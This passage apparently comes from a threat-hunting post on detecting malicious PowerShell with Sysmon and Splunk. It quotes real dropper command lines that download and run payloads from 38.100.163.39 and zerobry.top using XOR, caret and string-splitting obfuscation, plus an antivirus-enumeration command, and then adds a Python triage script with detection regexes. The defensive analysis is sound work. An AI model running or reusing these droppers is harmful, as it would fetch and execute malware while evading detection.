$x='a3f57212-1462-4ae7-8745-5e178820d04c';$y='Z:\tmp\0071d19d5252c44f7678674387862fc262846790a3f7a22fd1a08bef822b4fa4.exe';try {
  if ([Environment]::Version.Major -ge 4)
  { $null = [Reflection.Assembly]::UnsafeLoadFrom($y) } else { $null = [Reflection.Assembly]::LoadFile($y)}
  . ([_32._88]::_74($x))
  exit $LASTEXITCODE
}
catch [NotSupportedException]
{
  Write-Host 'Application location is untrusted. Copy file to a local drive, and try again.' -ForegroundColor Red
}
catch {
  Write-Host ("Error: " + $_.Exception.Message) -Fore Red
}

powershell.exe -NoP -sta -NonI -W Hidden -Enc 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
The last encoded command is basically a dropper. A normal User-Agent is defined to avoid detection:
[SYsTeM.Net.SERviCePoiNtMANAGER]::ExPECt100CoNtiNuE = 0;$wC=New-ObJeCt SYstEm.NeT.WebCliENt;
$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wc.HeADeRs.AdD('User-Agent',$u);$wC.PrOxy = [SySTeM.NeT.WebRequESt]::DEfAUltWEBPrOXY;$Wc.PROXy.CrEDenTiALS = [SystEm.NEt.CREdEnTIALCAchE]::DeFAulTNetwoRKCRedEntIAlS;
$K='u)1,y(mjfa*E5#2LO3}9h6c-zIx]iok%';$i=0;[chAR[]]$B=([CHAr[]]($wc.DowNLoADStRing("http://38.100.163.39:8080/index.asp")))|%{$_-BXOr$k[$I++%$k.LenGTH]};IEX ($B-join''

powershell -ExecutionPolicy ByPass -NoProfile -command (New-Object Net.WebClient).('Downl'+'oadfile').invoke('ht'+'tp://'+'zerobry.top/bomfunk/','C:\Users\angel\AppData\Local\Temp\gIGSBXS.exe');starT-ProCEss 'C:\Users\angel\AppData\Local\Temp\gIGSBXS.exe';
This PowerShell command acts as a dropper. It is interesting to check the ParentProcessCommand, as it uses the "^" character to avoid detection:
"C:\Windows\System32\cmd.exe" /c po^wers^he^l^l -Ex^ecutio^nPol^icy B^yP^ass -N^oP^rofile -com^mand (New-O^bj^ect N^et.WebCl^ient).('Downl'+'oadfile').invoke('ht'+'tp://'+'zerobry.top/bomfunk/','C:\Users\angel\AppData\Local\Temp\gIGSBXS.exe');starT-ProCEss 'C:\Users\angel\AppData\Local\Temp\gIGSBXS.exe';

The last command detects whether any Antivirus/Antispyware is installed and running:
powershell.exe -inputformat none -NoProfile -NoLogo -Command "& {$avlist = @(); $os = Get-WmiObject Win32_OperatingSystem; if ($os.ProductType -eq 3) {Write-Host \"ServerOS|0\";} elseif ($os.Version -like \"5.*\") {Get-WmiObject -Namespace root\SecurityCenter -Class AntiVirusProduct | ForEach-Object {Write-Host \"$($_.displayName)|$(if ($_.onAccessScanningEnabled) {\"4096\"} else {\"0\"})\"};} else {Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct | ForEach-Object {$avlist += \"$($_.displayName)|$($_.productState)\"};Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiSpywareProduct | ForEach-Object {$avlist += \"$($_.displayName)|$($_.productState)\"};} Write-Host ($avlist -join \"*\")}"

As shown, PowerShell can be abused in many different ways through the different phases of an intrusion; therefore it is very important to monitor for suspicious PowerShell commands, and Sysmon+Splunk can really help with this.
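As an added example (not the post's own code), the following Python triage applies the indicators discussed in this post and in the Retefe dropper analysis above (execution policy bypass, hidden window, encoded commands, caret and string-concatenation obfuscation, download cradles, firewall/Defender tampering) to the command lines Sysmon ProcessCreate events carry; the command lines are constructed fixtures and the encoded one wraps a harmless download-cradle string so the block runs offline.

```python
"""Triage of PowerShell command lines from Sysmon ProcessCreate events.

Added example, not the post's own code. It applies the indicators discussed
in the post and decodes -EncodedCommand the way PowerShell does (base64 of
UTF-16LE). The command lines below are constructed fixtures.
"""
import base64
import re


def encode_command(script: str) -> str:
    """Encode a script as PowerShell expects for -EncodedCommand (UTF-16LE base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str) -> str:
    """Reverse -EncodedCommand; tolerate surrounding quotes and missing padding."""
    blob = blob.strip().strip("\"'")
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-16-le", errors="replace")


def strip_carets(cmdline: str) -> str:
    """Undo cmd.exe caret escaping (po^wers^he^l^l -> powershell)."""
    return cmdline.replace("^", "")


# Regexes for the indicators described in the post (case-insensitive).
INDICATORS = {
    "execution_policy_bypass": re.compile(r"-ex\w*\s+bypass", re.I),
    "hidden_window": re.compile(r"-w(indowstyle|in)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-(e|en|enc|encodedcommand)\s+\S+", re.I),
    "download_cradle": re.compile(r"downloadfile|downloadstring|iex\b|invoke-expression", re.I),
    "firewall_or_defender_tamper": re.compile(r"netsh\s+(adv)?firewall|windefend|vssadmin", re.I),
}
ENC_RE = re.compile(r"-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=\"']+)", re.I)
CONCAT_RE = re.compile(r"'\s*\+\s*'")  # 'Downl'+'oadfile' style splitting


def triage(cmdline: str, parent_cmdline: str = "") -> dict:
    """Score a command line (plus its parent) and surface the decoded payload."""
    visible = strip_carets(cmdline)
    parent = strip_carets(parent_cmdline)
    decoded = ""
    m = ENC_RE.search(visible)
    if m:
        try:
            decoded = decode_encoded_command(m.group(1))
        except (ValueError, UnicodeDecodeError):
            decoded = ""
    text = " ".join([visible, parent, decoded])
    folded = CONCAT_RE.sub("", text)  # rejoin split string literals before matching
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(folded))
    if CONCAT_RE.search(text):
        hits.append("string_concat_obfuscation")
    if "^" in cmdline or "^" in parent_cmdline:
        hits.append("caret_obfuscation")
    return {"indicators": hits, "decoded": decoded, "score": len(hits)}


# Constructed fixtures modelled on the command lines analysed in the post.
SAMPLE_SCRIPT = "(New-Object Net.WebClient).DownloadFile('http://example.invalid/x','C:\\Temp\\x.exe')"
SAMPLES = [
    ("powershell -win hidden -enc " + encode_command(SAMPLE_SCRIPT), ""),
    ('"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -ExecutionPolicy bypass '
     "-noprofile -windowstyle hidden cmd /c SafetyTest.rar", ""),
    ("powershell -ExecutionPolicy ByPass -NoProfile -command (New-Object Net.WebClient)"
     ".('Downl'+'oadfile').invoke('ht'+'tp://'+'example.invalid/','C:\\Temp\\g.exe')",
     '"C:\\Windows\\System32\\cmd.exe" /c po^wers^he^l^l -Ex^ecutio^nPol^icy B^yP^ass'),
    ("powershell -NoProfile -Command Get-Date", ""),
]

if __name__ == "__main__":
    for cmd, parent in SAMPLES:
        result = triage(cmd, parent)
        print(result["score"], result["indicators"])
```

Fed with the CommandLine and ParentCommandLine fields of Sysmon event ID 1, the score gives a first ranking of which PowerShell executions deserve a closer look.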

Indicators: